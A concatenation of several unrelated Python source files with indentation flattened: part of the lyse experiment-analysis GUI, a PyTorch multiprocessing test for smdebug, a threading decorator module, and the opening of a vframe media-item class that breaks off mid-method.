def on_run_multishot_analysis_clicked(self):
self.multishot_required = True
self.analysis_pending.set()
def set_columns_visible(self, columns_visible):
self.shots_model.set_columns_visible(columns_visible)
@inmain_decorator()
def set_add_shots_progress(self, completed, total, message):
self.ui.progressBar_add_shots.setFormat("Adding shots: [{}] %v/%m (%p%)".format(message))
if completed == total and message is None:
self.ui.progressBar_add_shots.hide()
else:
if total is not None:
self.ui.progressBar_add_shots.setMaximum(total)
if completed is not None:
self.ui.progressBar_add_shots.setValue(completed)
if self.ui.progressBar_add_shots.isHidden():
self.ui.progressBar_add_shots.show()
if completed is None and total is None and message is not None:
# Ensure a repaint when only the message changes:
self.ui.progressBar_add_shots.repaint()
def incoming_buffer_loop(self):
"""We use a queue as a buffer for incoming shots. We don't want to hang and not
respond to a client submitting shots, so we just let shots pile up here until we can get to them.
The downside to this is that we can't return errors to the client if the shot cannot be added,
but the suggested workflow is to handle errors here anyway. A client running shots shouldn't stop
the experiment on account of errors from the analyis stage, so what's the point of passing errors to it?
We'll just raise errors here and the user can decide what to do with them."""
logger = logging.getLogger('lyse.FileBox.incoming')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
n_shots_added = 0
while True:
try:
filepaths = []
filepath = self.incoming_queue.get()
filepaths.append(filepath)
if self.incoming_queue.qsize() == 0:
# Wait momentarily in case more arrive so we can batch process them:
time.sleep(0.1)
# Batch process to decrease number of dataframe concatenations:
batch_size = len(self.shots_model.dataframe) // 3 + 1
while True:
try:
filepath = self.incoming_queue.get(False)
except queue.Empty:
break
else:
filepaths.append(filepath)
if len(filepaths) >= batch_size:
break
logger.info('adding:\n%s' % '\n'.join(filepaths))
if n_shots_added == 0:
total_shots = self.incoming_queue.qsize() + len(filepaths)
self.set_add_shots_progress(1, total_shots, "reading shot files")
# Remove duplicates from the list (preserving order) in case the
# client sent the same filepath multiple times:
filepaths = sorted(set(filepaths), key=filepaths.index) # Inefficient but readable
# We open the HDF5 files here outside the GUI thread so as not to hang the GUI:
dataframes = []
indices_of_files_not_found = []
for i, filepath in enumerate(filepaths):
try:
dataframe = get_dataframe_from_shot(filepath)
dataframes.append(dataframe)
except IOError:
app.output_box.output('Warning: Ignoring shot file not found or not readable %s\n' % filepath, red=True)
indices_of_files_not_found.append(i)
n_shots_added += 1
shots_remaining = self.incoming_queue.qsize()
total_shots = n_shots_added + shots_remaining + len(filepaths) - (i + 1)
self.set_add_shots_progress(n_shots_added, total_shots, "reading shot files")
self.set_add_shots_progress(n_shots_added, total_shots, "concatenating dataframes")
if dataframes:
new_row_data = concat_with_padding(*dataframes)
else:
new_row_data = None
# Do not add the shots that were not found on disk. Reverse
# loop so that removing an item doesn't change the indices of
# subsequent removals:
for i in reversed(indices_of_files_not_found):
del filepaths[i]
if filepaths:
self.shots_model.add_files(filepaths, new_row_data)
# Let the analysis loop know to look for new shots:
self.analysis_pending.set()
if shots_remaining == 0:
self.set_add_shots_progress(n_shots_added, total_shots, None)
n_shots_added = 0 # reset our counter for the next batch
except Exception:
# Keep this incoming loop running at all costs, but make the
# otherwise uncaught exception visible to the user:
zprocess.raise_exception_in_thread(sys.exc_info())
def analysis_loop(self):
logger = logging.getLogger('lyse.FileBox.analysis_loop')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
while True:
try:
self.analysis_pending.wait()
self.analysis_pending.clear()
at_least_one_shot_analysed = False
while True:
if not self.analysis_paused:
# Find the first shot that has not finished being analysed:
filepath = self.shots_model.get_first_incomplete()
if filepath is not None:
logger.info('analysing: %s'%filepath)
self.do_singleshot_analysis(filepath)
at_least_one_shot_analysed = True
if filepath is None and at_least_one_shot_analysed:
self.multishot_required = True
if filepath is None:
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
else:
logger.info('analysis is paused')
break
if self.multishot_required:
logger.info('doing multishot analysis')
self.do_multishot_analysis()
except Exception:
etype, value, tb = sys.exc_info()
orig_exception = ''.join(traceback.format_exception_only(etype, value))
message = ('Analysis loop encountered unexpected exception. ' +
'This is a bug and should be reported. The analysis ' +
'loop is continuing, but lyse may be in an inconsistent state. '
'Restart lyse, or continue at your own risk. '
'Original exception was:\n\n' + orig_exception)
# Raise the exception in a thread so we can keep running
zprocess.raise_exception_in_thread((RuntimeError, RuntimeError(message), tb))
self.pause_analysis()
@inmain_decorator()
def pause_analysis(self):
# This automatically triggers the slot that sets self.analysis_paused
self.ui.pushButton_analysis_running.setChecked(True)
def do_singleshot_analysis(self, filepath):
# Check the shot file exists before sending it to the singleshot
# routinebox. This does not guarantee it won't have been deleted by
# the time the routinebox starts running analysis on it, but by
# detecting it now we can most of the time avoid the user code
# coughing exceptions due to the file not existing. Which would also
# not be a problem, but this way we avoid polluting the outputbox with
# more errors than necessary.
if not os.path.exists(filepath):
self.shots_model.mark_as_deleted_off_disk(filepath)
return
self.to_singleshot.put(filepath)
while True:
signal, status_percent, updated_data = self.from_singleshot.get()
for file in updated_data:
# Update the data for all the rows with new data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
# Update the status percent for the the row on which analysis is actually
# running:
if status_percent is not None:
self.shots_model.set_status_percent(filepath, status_percent)
if signal == 'done':
return
if signal == 'error':
if not os.path.exists(filepath):
# Do not pause if the file has been deleted. An error is
# no surprise there:
self.shots_model.mark_as_deleted_off_disk(filepath)
else:
self.pause_analysis()
return
if signal == 'progress':
continue
raise ValueError('invalid signal %s' % str(signal))
def do_multishot_analysis(self):
self.to_multishot.put(None)
while True:
signal, _, updated_data = self.from_multishot.get()
for file in updated_data:
self.shots_model.update_row(file, updated_row_data=updated_data[file])
if signal == 'done':
self.multishot_required = False
return
elif signal == 'error':
self.pause_analysis()
return
class Lyse(object):
def __init__(self):
splash.update_text('loading graphical interface')
loader = UiLoader()
self.ui = loader.load(os.path.join(LYSE_DIR, 'main.ui'), LyseMainWindow())
self.connect_signals()
self.setup_config()
self.port = int(self.exp_config.get('ports', 'lyse'))
# The singleshot routinebox will be connected to the filebox
# by queues:
to_singleshot = queue.Queue()
from_singleshot = queue.Queue()
# So will the multishot routinebox:
to_multishot = queue.Queue()
from_multishot = queue.Queue()
self.output_box = OutputBox(self.ui.verticalLayout_output_box)
self.singleshot_routinebox = RoutineBox(self.ui.verticalLayout_singleshot_routinebox, self.exp_config,
self, to_singleshot, from_singleshot, self.output_box.port)
self.multishot_routinebox = RoutineBox(self.ui.verticalLayout_multishot_routinebox, self.exp_config,
self, to_multishot, from_multishot, self.output_box.port, multishot=True)
self.filebox = FileBox(self.ui.verticalLayout_filebox, self.exp_config,
to_singleshot, from_singleshot, to_multishot, from_multishot)
self.last_save_config_file = None
self.last_save_data = None
self.ui.actionLoad_configuration.triggered.connect(self.on_load_configuration_triggered)
self.ui.actionRevert_configuration.triggered.connect(self.on_revert_configuration_triggered)
self.ui.actionSave_configuration.triggered.connect(self.on_save_configuration_triggered)
self.ui.actionSave_configuration_as.triggered.connect(self.on_save_configuration_as_triggered)
self.ui.actionSave_dataframe_as.triggered.connect(lambda: self.on_save_dataframe_triggered(True))
self.ui.actionSave_dataframe.triggered.connect(lambda: self.on_save_dataframe_triggered(False))
self.ui.actionLoad_dataframe.triggered.connect(self.on_load_dataframe_triggered)
self.ui.resize(1600, 900)
# Set the splitters to appropriate fractions of their maximum size:
self.ui.splitter_horizontal.setSizes([1000, 600])
self.ui.splitter_vertical.setSizes([300, 600])
# autoload a config file, if labconfig is set to do so:
try:
autoload_config_file = self.exp_config.get('lyse', 'autoload_config_file')
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
self.output_box.output('Ready.\n\n')
else:
self.ui.setEnabled(False)
self.output_box.output('Loading default config file %s...' % autoload_config_file)
def load_the_config_file():
try:
self.load_configuration(autoload_config_file, restore_window_geometry)
self.output_box.output('done.\n')
except Exception as e:
self.output_box.output('\nCould not load config file: %s: %s\n\n' %
(e.__class__.__name__, str(e)), red=True)
else:
self.output_box.output('Ready.\n\n')
finally:
self.ui.setEnabled(True)
# Load the window geometry now, but then defer the other loading until 50ms
# after the window has shown, so that the GUI pops up faster in the meantime.
try:
self.load_window_geometry_configuration(autoload_config_file)
except Exception:
# ignore error for now and let it be raised again in the call to load_configuration:
restore_window_geometry = True
else:
# Success - skip loading window geometry in load_configuration:
restore_window_geometry = False
self.ui.firstPaint.connect(lambda: QtCore.QTimer.singleShot(50, load_the_config_file))
self.ui.show()
# self.ui.showMaximized()
def terminate_all_workers(self):
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.end_child()
def workers_terminated(self):
terminated = {}
for routine in self.singleshot_routinebox.routines + self.multishot_routinebox.routines:
routine.worker.poll()
terminated[routine.filepath] = routine.worker.returncode is not None
return terminated
def are_you_sure(self):
message = ('Current configuration (which scripts are loaded and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Quit lyse', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return False
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
return True
def on_close_event(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
if self.only_window_geometry_is_different(save_data, self.last_save_data):
self.save_configuration(self.last_save_config_file)
self.terminate_all_workers()
return True
elif not self.are_you_sure():
return False
self.terminate_all_workers()
return True
def on_save_configuration_triggered(self):
if self.last_save_config_file is None:
self.on_save_configuration_as_triggered()
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
else:
self.save_configuration(self.last_save_config_file)
def on_revert_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = 'Revert configuration to the last saved state in \'%s\'?' % self.last_save_config_file
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
elif reply == QtWidgets.QMessageBox.Yes:
self.load_configuration(self.last_save_config_file)
else:
error_dialog('no changes to revert')
def on_save_configuration_as_triggered(self):
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
try:
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
except LabConfig.NoOptionError:
self.exp_config.set('DEFAULT', 'app_saved_configs', os.path.join('%(labscript_suite)s', 'userlib', 'app_saved_configs', '%(experiment_name)s'))
default_path = os.path.join(self.exp_config.get('DEFAULT', 'app_saved_configs'), 'lyse')
if not os.path.exists(default_path):
os.makedirs(default_path)
default = os.path.join(default_path, 'lyse.ini')
save_file = QtWidgets.QFileDialog.getSaveFileName(self.ui,
'Select file to save current lyse configuration',
default,
"config files (*.ini)")
if type(save_file) is tuple:
save_file, _ = save_file
if not save_file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
save_file = os.path.abspath(save_file)
self.save_configuration(save_file)
def only_window_geometry_is_different(self, current_data, old_data):
ui_keys = ['window_size', 'window_pos', 'splitter', 'splitter_vertical', 'splitter_horizontal']
compare = [current_data[key] == old_data[key] for key in current_data.keys() if key not in ui_keys]
return all(compare)
def get_save_data(self):
save_data = {}
box = self.singleshot_routinebox
save_data['SingleShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastSingleShotFolder'] = box.last_opened_routine_folder
box = self.multishot_routinebox
save_data['MultiShot'] = list(zip([routine.filepath for routine in box.routines],
[box.model.item(row, box.COL_ACTIVE).checkState()
for row in range(box.model.rowCount())]))
save_data['LastMultiShotFolder'] = box.last_opened_routine_folder
save_data['LastFileBoxFolder'] = self.filebox.last_opened_shots_folder
save_data['analysis_paused'] = self.filebox.analysis_paused
window_size = self.ui.size()
save_data['window_size'] = (window_size.width(), window_size.height())
window_pos = self.ui.pos()
save_data['window_pos'] = (window_pos.x(), window_pos.y())
save_data['screen_geometry'] = get_screen_geometry()
save_data['splitter'] = self.ui.splitter.sizes()
save_data['splitter_vertical'] = self.ui.splitter_vertical.sizes()
save_data['splitter_horizontal'] = self.ui.splitter_horizontal.sizes()
return save_data
def save_configuration(self, save_file):
lyse_config = LabConfig(save_file)
save_data = self.get_save_data()
self.last_save_config_file = save_file
self.last_save_data = save_data
for key, value in save_data.items():
lyse_config.set('lyse_state', key, pprint.pformat(value))
def on_load_configuration_triggered(self):
save_data = self.get_save_data()
if self.last_save_data is not None and save_data != self.last_save_data:
message = ('Current configuration (which groups are active/open and other GUI state) '
'has changed: save config file \'%s\'?' % self.last_save_config_file)
reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
if reply == QtWidgets.QMessageBox.Cancel:
return
if reply == QtWidgets.QMessageBox.Yes:
self.save_configuration(self.last_save_config_file)
if self.last_save_config_file is not None:
default = self.last_save_config_file
else:
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'lyse.ini')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select lyse configuration file to load',
default,
"config files (*.ini)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
self.load_configuration(file)
def load_configuration(self, filename, restore_window_geometry=True):
self.last_save_config_file = filename
self.ui.actionSave_configuration.setText('Save configuration %s' % filename)
lyse_config = LabConfig(filename)
try:
self.singleshot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'SingleShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.singleshot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastSingleShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.add_routines(ast.literal_eval(lyse_config.get('lyse_state', 'MultiShot')), clear_existing=True)
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.multishot_routinebox.last_opened_routine_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastMultiShotFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.filebox.last_opened_shots_folder = ast.literal_eval(lyse_config.get('lyse_state', 'LastFileBoxFolder'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
if ast.literal_eval(lyse_config.get('lyse_state', 'analysis_paused')):
self.filebox.pause_analysis()
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
if restore_window_geometry:
self.load_window_geometry_configuration(filename)
# Set as self.last_save_data:
save_data = self.get_save_data()
self.last_save_data = save_data
self.ui.actionSave_configuration_as.setEnabled(True)
self.ui.actionRevert_configuration.setEnabled(True)
def load_window_geometry_configuration(self, filename):
"""Load only the window geometry from the config file. It's useful to have this
separate from the rest of load_configuration so that it can be called before the
window is shown."""
lyse_config = LabConfig(filename)
try:
screen_geometry = ast.literal_eval(lyse_config.get('lyse_state', 'screen_geometry'))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
else:
# Only restore the window size and position, and splitter
# positions if the screen is the same size/same number of monitors
# etc. This prevents the window moving off the screen if say, the
# position was saved when 2 monitors were plugged in but there is
# only one now, and the splitters may not make sense in light of a
# different window size, so better to fall back to defaults:
current_screen_geometry = get_screen_geometry()
if current_screen_geometry == screen_geometry:
try:
self.ui.resize(*ast.literal_eval(lyse_config.get('lyse_state', 'window_size')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.move(*ast.literal_eval(lyse_config.get('lyse_state', 'window_pos')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_vertical.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_vertical')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
try:
self.ui.splitter_horizontal.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_horizontal')))
except (LabConfig.NoOptionError, LabConfig.NoSectionError):
pass
def setup_config(self):
required_config_params = {"DEFAULT": ["experiment_name"],
"programs": ["text_editor",
"text_editor_arguments",
"hdf5_viewer",
"hdf5_viewer_arguments"],
"paths": ["shared_drive",
"experiment_shot_storage",
"analysislib"],
"ports": ["lyse"]
}
self.exp_config = LabConfig(required_params=required_config_params)
def connect_signals(self):
if os.name == 'nt':
self.ui.newWindow.connect(set_win_appusermodel)
# Keyboard shortcuts:
QtWidgets.QShortcut('Del', self.ui, lambda: self.delete_items(True))
QtWidgets.QShortcut('Shift+Del', self.ui, lambda: self.delete_items(False))
def on_save_dataframe_triggered(self, choose_folder=True):
df = self.filebox.shots_model.dataframe.copy()
if len(df) > 0:
default = self.exp_config.get('paths', 'experiment_shot_storage')
if choose_folder:
save_path = QtWidgets.QFileDialog.getExistingDirectory(self.ui, 'Select a Folder for the Dataframes', default)
if type(save_path) is tuple:
save_path, _ = save_path
if not save_path:
# User cancelled
return
sequences = df.sequence.unique()
for sequence in sequences:
sequence_df = pandas.DataFrame(df[df['sequence'] == sequence], columns=df.columns).dropna(axis=1, how='all')
labscript = sequence_df['labscript'].iloc[0]
filename = "dataframe_{}_{}.msg".format(sequence.to_pydatetime().strftime("%Y%m%dT%H%M%S"),labscript[:-3])
if not choose_folder:
save_path = os.path.dirname(sequence_df['filepath'].iloc[0])
sequence_df.infer_objects()
for col in sequence_df.columns :
if sequence_df[col].dtype == object:
sequence_df[col] = pandas.to_numeric(sequence_df[col], errors='ignore')
sequence_df.to_msgpack(os.path.join(save_path, filename))
else:
error_dialog('Dataframe is empty')
def on_load_dataframe_triggered(self):
default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'dataframe.msg')
file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
'Select dataframe file to load',
default,
"dataframe files (*.msg)")
if type(file) is tuple:
file, _ = file
if not file:
# User cancelled
return
# Convert to standard platform specific path, otherwise Qt likes
# forward slashes:
file = os.path.abspath(file)
df = pandas.read_msgpack(file).sort_values("run time").reset_index()
# Check for changes in the shot files since the dataframe was exported
def changed_since(filepath, time):
if os.path.isfile(filepath):
return os.path.getmtime(filepath) > time
else:
return False
filepaths = df["filepath"].tolist()
changetime_cache = os.path.getmtime(file)
need_updating = np.where(map(lambda x: changed_since(x, changetime_cache), filepaths))[0]
need_updating = np.sort(need_updating)[::-1] # sort in descending order to not remove the wrong items with pop
# Reload the files where changes where made since exporting
for index in need_updating:
filepath = filepaths.pop(index)
self.filebox.incoming_queue.put(filepath)
df = df.drop(need_updating)
self.filebox.shots_model.add_files(filepaths, df, done=True)
def delete_items(self, confirm):
"""Delete items from whichever box has focus, with optional confirmation
dialog"""
if self.filebox.ui.tableView.hasFocus():
self.filebox.shots_model.remove_selection(confirm)
if self.singleshot_routinebox.ui.treeView.hasFocus():
self.singleshot_routinebox.remove_selection(confirm)
if self.multishot_routinebox.ui.treeView.hasFocus():
self.multishot_routinebox.remove_selection(confirm)
if __name__ == "__main__":
logger = setup_logging('lyse')
labscript_utils.excepthook.set_logger(logger)
logger.info('\n\n===============starting===============\n')
qapplication = QtWidgets.QApplication(sys.argv)
qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
app = Lyse()
# Start the web server:
splash.update_text('starting analysis server')
server = WebServer(app.port)
splash.update_text('done')
# Let the interpreter run every 500ms so it sees Ctrl-C interrupts:
timer = QtCore.QTimer()
timer.start(500)
timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
# Upon seeing a ctrl-c interrupt, quit the event loop
signal.signal(signal.SIGINT, lambda *args: qapplication.exit())
splash.hide()
qapplication.exec_()
server.shutdown()
|
test_pytorch_multiprocessing.py
|
# Future
from __future__ import print_function
# Standard Library
import os
import shutil
# Third Party
import torch
import torch.multiprocessing as mp
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from tests.zero_code_change.utils import build_json
from torchvision import datasets, transforms
# First Party
from smdebug.trials import create_trial
data_dir = "/tmp/pytorch-mnist-data"
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
def train(rank, model, device, dataloader_kwargs):
# Training Settings
batch_size = 64
epochs = 1
lr = 0.01
momentum = 0.5
torch.manual_seed(1 + rank)
train_loader = torch.utils.data.DataLoader(
datasets.MNIST(
data_dir,
train=True,
download=True,
transform=transforms.Compose(
[transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]
),
),
batch_size=batch_size,
shuffle=True,
num_workers=1,
**dataloader_kwargs
)
optimizer = optim.SGD(model.parameters(), lr=lr, momentum=momentum)
for epoch in range(1, epochs + 1):
train_epoch(epoch, model, device, train_loader, optimizer)
def train_epoch(epoch, model, device, data_loader, optimizer):
model.train()
for batch_idx, (data, target) in enumerate(data_loader):
if batch_idx > 4:
break
optimizer.zero_grad()
output = model(data.to(device))
loss = F.nll_loss(output, target.to(device))
loss.backward()
optimizer.step()
def test_no_failure_with_torch_mp(out_dir):
shutil.rmtree(out_dir, ignore_errors=True)
path = build_json(out_dir, save_all=True, save_interval="1")
path = str(path)
os.environ["SMDEBUG_CONFIG_FILE_PATH"] = path
device = "cpu"
dataloader_kwargs = {}
cpu_count = 2 if mp.cpu_count() > 2 else mp.cpu_count()
torch.manual_seed(1)
model = Net().to(device)
model.share_memory() # gradients are allocated lazily, so they are not shared here
processes = []
for rank in range(cpu_count):
p = mp.Process(target=train, args=(rank, model, device, dataloader_kwargs))
# We first train the model across `num_processes` processes
p.start()
processes.append(p)
for p in processes:
p.join()
trial = create_trial(out_dir)
assert trial.num_workers == 1 # Ensure only one worker saved data
assert len(trial.tensor_names()) > 20 # Ensure that data was saved
assert trial.steps() == [0, 1, 2, 3] # Ensure that steps were saved
shutil.rmtree(out_dir, ignore_errors=True)
shutil.rmtree(data_dir, ignore_errors=True)
|
threaded.py
|
# This program is public domain
# Author: Paul Kienzle
"""
Thread and daemon decorators.
See :function:`threaded` and :function:`daemon` for details.
"""
from functools import wraps
import itertools
import threading
#TODO: fix race conditions
# notify may be called twice in after()
# 1. main program calls fn() which starts the processing and returns job
# 2. main program calls job.after(notify)
# 3. after() suspends when __after is set but before __stopped is checked
# 4. thread ends, setting __stopped and calling __after(result)
# 5. main resumes, calling __after(result) since __stoped is now set
# solution is to use thread locks when testing/setting __after.
_after_lock = threading.Lock()
class AfterThread(threading.Thread):
"""
Thread class with additional 'after' capability which runs a function
after the thread is complete. This allows us to separate the notification
from the computation.
Unlike Thread.join, the wait() method returns the value of the computation.
"""
name = property(threading.Thread.getName,
threading.Thread.setName,
doc="Thread name")
def __init__(self, *args, **kwargs):
self.__result = None
self.__after = kwargs.pop('after',None)
threading.Thread.__init__(self, *args, **kwargs)
def after(self, notify=None):
"""
Calls notify after the thread is complete. Notify should
take a single argument which is the result of the function.
Note that notify will be called from the main thread if the
thread is already complete when thread.after(notify) is called,
otherwise it will be called from thread.
"""
_after_lock.acquire()
self.__after = notify
# Run immediately if thread is already complete
if self._Thread__started and self._Thread__stopped:
post = notify
else:
post = lambda x: x
_after_lock.release()
post(self.__result)
def run(self):
"""
Run the thread followed by the after function if any.
"""
if self._Thread__target:
self.__result = self._Thread__target(*self._Thread__args,
**self._Thread__kwargs)
_after_lock.acquire()
if self.__after is not None:
post = self.__after
else:
post = lambda x: x
_after_lock.release()
post(self.__result)
def wait(self, timeout=None):
"""
Wait for the thread to complete.
Returns the result of the computation.
Example::
result = thread.wait()
If timeout is used, then wait() may return before the result is
available. In this case, wait() will return None. This can be
used as follows::
while True:
result = thread.wait(timeout=0)
if result is not None: break
... do something else while waiting ...
Timeout should not be used with functions that may return None.
This is due to the race condition in which the thread completes
between the timeout triggering in wait() and the main thread
calling thread.isAlive().
"""
self.join(timeout)
return self.__result
def threaded(fn):
"""
@threaded decorator for functions to be run in a thread.
Returns the running thread.
The returned thread supports the following methods::
wait(timeout=False)
Waits for the function to complete.
Returns the result of the function if the thread is joined,
or None if timeout. Use thread.isAlive() to test for timeout.
after(notify)
Calls notify after the thread is complete. Notify should
take a single argument which is the result of the function.
isAlive()
Returns True if thread is still running.
name
Thread name property. By default the name is 'fn-#' where fn
is the function name and # is the number of times the thread
has been invoked.
For example::
@threaded
def compute(self,input):
...
def onComputeButton(self,evt):
thread = self.compute(self.input.GetValue())
thread.after(lambda result: wx.Post(self.win,wx.EVT_PAINT))
A threaded function can also be invoked directly in the current thread::
result = self.compute.main(self.input.GetValue())
All threads must complete before the program can exit. For queue
processing threads which wait are alive continuously waiting for
new input, use the @daemon decorator instead.
"""
instance = itertools.count(1)
@wraps(fn)
def wrapper(*args, **kw):
name = "%s-%d"%(fn.__name__,next(instance))
thread = AfterThread(target=fn,args=args,kwargs=kw,name=name)
thread.start()
return thread
wrapper.main = fn
return wrapper
def daemon(fn):
"""
@daemon decorator for functions to be run in a thread.
Returns the running thread.
Unlike threaded functions, daemon functions are not expected to complete.
"""
instance_counter = itertools.count(1)
@wraps(fn)
def wrapper(*args, **kw):
name = "%s-%d"%(fn.__name__,next(instance_counter))
thread = threading.Thread(target=fn,args=args,kwargs=kw,name=name)
thread.setDaemon(True)
thread.start()
return thread
wrapper.main = fn
return wrapper
|
chair_item.py
|
"""Object that passes through the chair/click pipeline"""
from os.path import join
from threading import Thread
import cv2 as cv
from imutils.video import FileVideoStream
from vframe.settings import types
from vframe.settings import vframe_cfg as cfg
from vframe.models.media_item import MediaRecordItem
from vframe.utils import logger_utils, file_utils, im_utils
import numpy as np
class ChairItem(object):
_chair_type = None
def __init__(self, ctx):
"""Items that pass through the chair pipeline"""
self._ctx = ctx
self._keyframes = {}
self._drawframes = {}
self._media_record = None
self.log = logger_utils.Logger.getLogger()
def purge_metadata(self):
"""Purge data to free up RAM"""
self._keyframes = {}
self._drawframes = {}
self._media_record = None
def set_keyframes(self, frames, add_drawframe=False):
"""Adds dict of keyframe images"""
self._keyframes = frames
if add_drawframe:
# deep copy frames
self._drawframes = {}
for frame_idx, frame in frames.items():
self._drawframes[frame_idx] = frame.copy()
def remove_keyframes(self):
self._keyframes = {}
def set_drawframes(self, frames):
"""Adds dict of keyframe images"""
self._drawframes = frames
def remove_drawframes(self):
self._drawframes = {}
# shortcuts
def get_metadata(self, metadata_type):
"""Gets metadata dict if it exists. Returns empty dict if none"""
return self._media_record.get_metadata(metadata_type)
def set_metadata(self, metadata_type, metadata):
self._media_record.set_metadata(metadata_type, metadata)
@property
def keyframes(self):
return self._keyframes
@property
def keyframe(self, frame_idx):
"""Returns keyframe image from frame index if exists"""
return self._keyframes.get(frame_idx, None)
@property
def drawframes(self):
return self._drawframes
@property
def drawframe(self, frame_idx):
"""Returns keyframe image from frame index if exists"""
return self._drawframes.get(frame_idx, None)
@property
def ctx(self):
return self._ctx
@property
def chair_type(self):
return self._chair_type
@property
def media_format(self):
"""alternate name for same data"""
return self._media_record.media_format
def load_images(self):
# overwrite
pass
class VideoKeyframeChairItem(ChairItem):
chair_type = types.ChairItemType.VIDEO_KEYFRAME
def __init__(self, ctx, frame, frame_idx):
super().__init__(ctx)
self._frame = frame
self._frame_idx = frame_idx
self._frame = frame
#self._keyframes = {frame_idx: self._frame}
mr = MediaRecordItem(0, types.MediaFormat.VIDEO, 0, metadata={})
self._media_record = mr
def remove_frames(self):
self.remove_frame()
self.remove_drawframe()
def remove_frame(self):
self._frame = None
def remove_drawframe(self):
self._drawframe = None
def load_images(self, opt_size_type, opt_drawframes=False):
"""This is broken because images are already loaded"""
# eventually move this into VideoChairItem
# temporary fix for testing:
self.set_keyframes({0: self._frame}, opt_drawframes)
@property
def frame(self):
return self._frame
@property
def drawframe(self):
return self._drawframe
class PhotoChairItem(ChairItem):
chair_type = types.ChairItemType.PHOTO
def __init__(self, ctx, fp_image):
super().__init__(ctx)
self._ctx = ctx
self._fp_image = fp_image
mr = MediaRecordItem(0, types.MediaFormat.PHOTO, 0, metadata={})
self._media_record = mr
def load_images(self, fp_image, opt_size_type, opt_drawframes=False):
# append metadata to chair_item's mapping item
opt_size = cfg.IMAGE_SIZES[opt_size_type]
im = im_utils.resize(cv.imread(self._fp_image), width=opt_size)
self.set_keyframes({0: im}, opt_drawframes)
class _x_VideoChairItem(ChairItem):
# CURRENTLY NOT IN USE
chair_type = types.ChairItemType.VIDEO
def __init__(self, ctx, fp_video):
super().__init__(ctx)
self._fp_video = fp_video
self._stream = None
self._frame_count = 0
self._width = 0
self._height = 0
self._fps = 0
self._mspf = 0
self._last_display_ms = 0
mr = MediaRecordItem(0, types.MediaFormat.VIDEO, 0, metadata={})
self._media_record = mr
def load_images(self, opt_size_type, opt_drawframes=False):
"""Loads keyframes from video"""
